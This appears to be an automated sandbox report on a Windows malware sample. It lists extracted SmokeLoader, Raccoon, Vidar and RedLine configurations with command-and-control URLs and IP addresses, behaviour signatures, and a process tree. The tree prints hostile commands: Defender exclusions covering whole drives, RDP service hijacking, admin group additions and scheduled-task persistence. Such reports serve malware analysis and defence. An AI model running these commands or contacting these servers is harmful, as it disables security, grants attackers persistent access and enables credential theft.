Analysis
-
max time kernel
152s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
13-10-2021 13:55
General
-
Target
6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
-
Size
310KB
-
MD5
4e7d2f61317c940dc939ba2ca9393a23
-
SHA1
12f176cf157b5958fb843907d3d44ac464f13d81
-
SHA256
6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb
-
SHA512
8dbd96f861b7e746752e9c2e4eddba9e882b3d18f130ee66574bf244e2e4a1140a4cd034c7b25c04778752b44434c2a2438c0037487c41f50ba361c8774589f0
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://honawey7.xyz/
http://wijibui0.xyz/
http://hefahei6.xyz/
http://pipevai4.xyz/
http://nalirou7.xyz/
http://xacokuo8.xyz/
http://hajezey1.xyz/
http://gejajoo7.xyz/
http://sysaheu9.xyz/
http://rixoxeu9.xyz/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Version
1.8.2
Botnet
fbe5e97e7d069407605ee9138022aa82166657e6
Attributes
-
url4cnc
http://telemirror.top/stevuitreen
http://tgmirror.top/stevuitreen
http://telegatt.top/stevuitreen
http://telegka.top/stevuitreen
http://telegin.top/stevuitreen
https://t.me/stevuitreen
rc4.plain
rc4.plain
Extracted
Family
vidar
Version
41.3
Botnet
1033
C2
https://mas.to/@oleg98
Attributes
-
profile_id
1033
Extracted
Family
raccoon
Botnet
4b9b8980a10a7e59f200af975a29a100ba819fe0
Attributes
-
url4cnc
http://telemirror.top/ararius809b
http://tgmirror.top/ararius809b
http://telegatt.top/ararius809b
http://telegka.top/ararius809b
http://telegin.top/ararius809b
https://t.me/ararius809b
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
w1
C2
109.234.34.165:12323
Extracted
Family
raccoon
Version
1.8.2
Botnet
c8fdd015293e99dac71bc0cfc194d3ce612abf3e
Attributes
-
url4cnc
http://telemirror.top/rocketmanthem2
http://tgmirror.top/rocketmanthem2
http://telegatt.top/rocketmanthem2
http://telegka.top/rocketmanthem2
http://telegin.top/rocketmanthem2
https://t.me/rocketmanthem2
rc4.plain
rc4.plain
Extracted
Family
raccoon
Botnet
7ebf9b416b72a203df65383eec899dc689d2c3d7
Attributes
-
url4cnc
http://telegatt.top/agrybirdsgamerept
http://telegka.top/agrybirdsgamerept
http://telegin.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
huyzalupanew
C2
135.181.208.162:13904
Extracted
Family
redline
Botnet
@Nastya_ero
C2
45.14.49.66:21899
Extracted
Family
redline
Botnet
MegaProliv2
C2
93.115.20.139:28978
Signatures
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Nirsoft 3 IoCs
-
Vidar Stealer 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 31 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
-
Suspicious use of SetThreadContext 5 IoCs
-
Drops file in Windows directory 8 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\C3C3.exeC:\Users\Admin\AppData\Local\Temp\C3C3.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\C73E.exeC:\Users\Admin\AppData\Local\Temp\C73E.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im C73E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C73E.exe" & del C:\ProgramData\*.dll & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im C73E.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\CFBB.exeC:\Users\Admin\AppData\Local\Temp\CFBB.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 9282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\D3F2.exeC:\Users\Admin\AppData\Local\Temp\D3F2.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\DDB7.exeC:\Users\Admin\AppData\Local\Temp\DDB7.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1j0jo4oh\1j0jo4oh.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES220F.tmp" "c:\Users\Admin\AppData\Local\Temp\1j0jo4oh\CSC445D7A85EDD9432F95C54633D8E6EAD.TMP"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E21D.exeC:\Users\Admin\AppData\Local\Temp\E21D.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\E21D.exeC:\Users\Admin\AppData\Local\Temp\E21D.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\E21D.exeC:\Users\Admin\AppData\Local\Temp\E21D.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\E21D.exeC:\Users\Admin\AppData\Local\Temp\E21D.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\EDF6.exeC:\Users\Admin\AppData\Local\Temp\EDF6.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F4AD.exeC:\Users\Admin\AppData\Local\Temp\F4AD.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FCEC.exeC:\Users\Admin\AppData\Local\Temp\FCEC.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1872 -s 6722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\29A.exeC:\Users\Admin\AppData\Local\Temp\29A.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Piejpnomdy.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\wslm.exe'3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\29A.exeC:\Users\Admin\AppData\Local\Temp\29A.exe2⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\bbjggueC:\Users\Admin\AppData\Roaming\bbjggue1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\bbjggueC:\Users\Admin\AppData\Roaming\bbjggue2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\5E7.exeC:\Users\Admin\AppData\Local\Temp\5E7.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\NylghausHosen_2021-10-12_23-24 2.exe"C:\Users\Admin\AppData\Local\Temp\NylghausHosen_2021-10-12_23-24 2.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\Qf5dSHBPGf8J.exe"C:\Users\Admin\AppData\Local\Temp\Qf5dSHBPGf8J.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\897.exeC:\Users\Admin\AppData\Local\Temp\897.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2364.exeC:\Users\Admin\AppData\Local\Temp\2364.exe1⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\314F.exeC:\Users\Admin\AppData\Local\Temp\314F.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\4⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Local\Temp\3A97.exeC:\Users\Admin\AppData\Local\Temp\3A97.exe1⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe" /SpecialRun 4101d8 38003⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\3A97.exe" -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\3A97.exe"C:\Users\Admin\AppData\Local\Temp\3A97.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\mine.exe"C:\Users\Admin\AppData\Local\Temp\mine.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\mine.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"5⤵
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe6⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"7⤵
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"9⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"8⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6666.exe"C:\Users\Admin\AppData\Local\Temp\6666.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
36KB
-
Filesize
64KB
-
Filesize
196KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
19.0MB
-
Filesize
568KB
-
Filesize
316KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
132KB
-
Filesize
112KB
-
Filesize
856KB
-
Filesize
500KB
-
Filesize
19.2MB
-
Filesize
6.0MB
-
Filesize
136KB
-
Filesize
580KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
624KB
-
Filesize
112KB
-
Filesize
196KB
-
Filesize
4KB
-
Filesize
60KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
4.0MB
-
Filesize
4KB
-
Filesize
4.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4.3MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
19.0MB
-
Filesize
568KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
19.0MB
-
Filesize
316KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB